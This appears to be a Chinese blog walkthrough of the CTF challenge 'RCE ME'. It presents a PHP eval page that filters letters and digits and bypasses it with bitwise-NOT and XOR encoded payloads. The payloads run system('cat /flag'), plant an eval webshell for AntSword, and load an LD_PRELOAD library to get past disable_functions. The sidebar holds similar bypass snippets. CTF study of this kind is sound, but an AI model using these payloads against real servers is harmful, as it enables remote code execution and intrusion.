一天一道ctf 第43天(php字符串异或取反绕过)

最新推荐文章于 2023-04-19 22:23:25 发布
最新推荐文章于 2023-04-19 22:23:25 发布
阅读量2.4k 收藏 12
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119055285
版权

[极客大挑战 2019]RCE ME
点开题目就是源码

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

代码很简洁,就是GET传参,绕过字母和数字的限制,然后eval执行。
可以用异或拼接或者直接取反,取反比较方便,先试一下system(‘cat /flag’)
在这里插入图片描述

?code=(~%8C%86%8C%8B%9A%92)(~%D7%D8%9C%9E%8B%DF%D0%99%93%9E%98%D8%D6);

没有反应,可能有什么被过滤了,再来查看一下phpinfo页面看看有没有什么提示,看到这里禁用了很多函数。

?code=(~%8F%97%8F%96%91%99%90)();

在这里插入图片描述
这样的话只能先构造webshell用蚁剑连接以后试试它的绕过功能了。
在这里插入图片描述

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);

在这里插入图片描述
看到了一个flag和一个readflag,但还是不能执行命令。可以用蚁剑的插件绕过disable_function,但是下载插件需要科学上网,我网不好上不去就算了。
在这里插入图片描述
在这里插入图片描述
看了网上的wp,可以从这个github上下载两个文件bypass_disablefunc.php和bypass_disablefunc_x64.so
然后上传至蚁剑上连接的var/tmp文件夹中,再执行以下payload即可。这里用的是异或绕过,%fe%fe%fe%fe^%a1%b9%bb%aa计算后是_GET.

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
在这里插入图片描述

?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so

在这里插入图片描述

scrawman
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $_POST['password']) { $username = $_POST['username']; $password = $_POST['password']; if(strlen($username
如何通过非数字与字符的方式实现PHP WebShell详解
12-12
前言 本文主要给大家介绍的是关于通过非数字与字符实现PHP WebShell的相关资料,分享出来供大家参考学习,下面来一起看看详细的介绍: 一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']); } 但如果你想要绕过WAF的话,你还得使用一些其他的技术来重写你的webshell。 思路 首先我们要明确思路,我的核心思想就是通过一系列字符变换最终利用非字母和非数字字符构建出webshell,然后使用PHP的动态函数(例如“
php小经验:解析preg_match与preg_match_all 函数
10-27
本篇文章是对php中的preg_match函数与preg_match_all函数进行了详细的分析介绍,需要的朋友参考下
CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!
06-10
信息安全-CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!让MISC题变得更简单!
PHP 正则表达式之正则处理函数小结(preg_match,preg_match_all,preg_replace,preg_split)
12-19
前面我们已经学习了正则表达式的基础语法,包括了定界符、原子、元字符和模式修正 符。实际上正则表达式想要起作用的话,就必须借用正则表达式处理函数。本节我们就来介绍一下PHP中基于perl的正则表达式处理函数,主要包含了分割, 匹配,查找,替换等等处理操作,依旧是配合示例讲解,让我们开始吧。 和正则表达式一样,正则表达式处理函数不能够独立使用,而这必须相结合,才能够完成特定的功能。在前面我们也说过,基于perl的正则表达式要快于POXIS正则表达式处理函数,所以我们只介绍以preg开头的基于perl的正则表达式。注意:在能偶使用字符串函数处理的时候,就不要使用正则表达式来处理字符串,因为字符串处理
RCE ME
oubasangdadada的博客
03-02 592
index.php <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is to...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5373
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
CTFshow--web入门--命令执行(29--55)
weixin_53425135的博客
11-23 2439
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
php异或绕过
weixin_53146913的博客
04-19 585
进行命令执行的函数基本都被过滤了,所以我们可以使用scandir(),var_dump(),readfile(),print_r()等函数查看目录,并获取flag,先获取看目录下的文件,通过print_r(scandir(.))输出当前目录下的内容,同样使用取反绕过。flag文件在最后,可以使用end直接将指针执行最后一个文件,然后读取,使用readfile(end(scandir(.));但是使用了16 >13种,所以这里的做法是,选取已有的13种,再生成另外的3种,从而绕过过滤。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7463
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
python通过自定义isnumber函数判断字符串是否为数字的方法
09-22
主要介绍了python通过自定义isnumber函数判断字符串是否为数字的方法,涉及Python操作字符串判断的相关技巧,需要的朋友可以参考下
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
记一个过滤字母数字异或取反等操作写shell的php脚本
weixin_42513429的博客
05-05 551
记一个过滤字母数字异或取反等操作写shell的php脚本前几的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本 前几的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本 上传脚本只是第一步,访问生成A.PHP写一个小马,然后就可以蚁剑连接,但是之后就没思路了,看了大佬们的wp是真的跪了,这里单纯记录一个脚本,一开始写的洋洋洒洒超过了2048个字...
ctf 绕过php,浅析CTF绕过字符数字构造shell
weixin_32101285的博客
03-19 2036
原标题:浅析CTF绕过字符数字构造shell12/14本文字数3734前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflat...
ctf (hardrce)
Glacier_Mount的博客
07-26 911
取反过滤
文件包含漏洞
Kradress的博客
12-12 595
文件包含 文件包含 php.ini参数设置 各协议的利用条件和方法 本地文件包含(LFI) 日志文件注入 session文件包含 默认路径 文件名 配置 getshell 上传页面 演示 条件竞争 临时文件包含 临时文件路径和文件名 使php崩溃,保存临时文件 自包含 伪协议 php://filter file:// data:// 远程文件包含 远程代码执行 php://input 任意文件读取 敏感文件 目录穿越 js目录穿越 python目录穿越 bypa
CTFSHOW-命令执行
Monica的博客
09-03 3716
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
关于使用异或绕过PHP过滤的方法
qq_54941823的博客
01-18 916
学前基础 异或:只能够是数字和数字之间的异或,原理是转换为二进制进行异或 URL编码使用的也是十六进制的编码,十六进制异或编码的时候用的都是0xff,也就是十进制的255 过程简述:数据的十进制——转换十六进制——进行0xff异或(回到了十进制)——转换为十六进制——再次进行0xff异或得到数据本身 字符——十进制——十六进制进行异或——变回十进制——转到十六进制进行异或——变回十进制——转为字符回到原本字符 实例(_GET) #此处使用python演示 _: 计算前字符 ...
Java swing + socket + mysql 五子棋网络对战游戏FiveChess.zip
最新发布
05-12
五子棋游戏想必大家都非常熟悉,游戏规则十分简单。游戏开始后,玩家在游戏设置中选择人机对战,则系统执黑棋,玩家自己执白棋。双方轮流下一棋,先将横、竖或斜线的5个或5个以上同色棋子连成不间断的一排者为胜。 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【技术】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
php ctf 路径绕过有哪些常用方法
05-13
PHP CTF 路径绕过漏洞的常用方法: 1. 相对路径绕过:在 URL 参数中使用 ../ 或者 ./ 等相对路径符号进行路径跳转,跳转到目标文件或目录。比如将 URL 中的 ../ 改为 %2e%2e%2f。 2. 绝对路径绕过:在 URL 参数中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值